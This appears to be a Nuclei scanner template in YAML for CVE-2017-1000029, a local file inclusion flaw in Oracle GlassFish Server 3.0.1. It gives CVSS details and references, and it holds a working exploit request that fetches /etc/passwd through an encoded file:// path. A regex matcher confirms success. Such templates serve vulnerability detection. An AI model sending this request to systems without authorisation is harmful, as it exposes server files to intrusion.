44 lines
1.6 KiB
YAML
44 lines
1.6 KiB
YAML
id: CVE-2017-1000029
|
|
|
|
info:
|
|
name: Oracle GlassFish Server Open Source Edition 3.0.1 - Local File Inclusion
|
|
author: 0x_Akoko
|
|
severity: high
|
|
description: Oracle GlassFish Server Open Source Edition 3.0.1 (build 22) is vulnerable to unauthenticated local file inclusion vulnerabilities that allow remote attackers to request arbitrary files on the server.
|
|
remediation: |
|
|
Apply the latest patches and updates provided by Oracle to fix the LFI vulnerability in GlassFish Server.
|
|
reference:
|
|
- https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=18784
|
|
- https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2016-011/?fid=8037
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2017-1000029
|
|
classification:
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
|
cvss-score: 7.5
|
|
cve-id: CVE-2017-1000029
|
|
cwe-id: CWE-200
|
|
epss-score: 0.00387
|
|
epss-percentile: 0.70207
|
|
cpe: cpe:2.3:a:oracle:glassfish_server:3.0.1:*:*:*:open_source:*:*:*
|
|
metadata:
|
|
max-request: 1
|
|
vendor: oracle
|
|
product: glassfish_server
|
|
tags: cve,cve2017,glassfish,oracle,lfi
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/resource/file%3a///etc/passwd/"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: regex
|
|
regex:
|
|
- "root:[x*]:0:0:"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
# digest: 4a0a00473045022100f48138a27b6a5cb32e7616e5c35738999b42cd5be862214b44e64c42cdb537670220774573d7b40428d78aef60fc363767d392b9de33dab70f952b23a1cbdf11f633:922c64590222798bb761d5b6d8e72950
|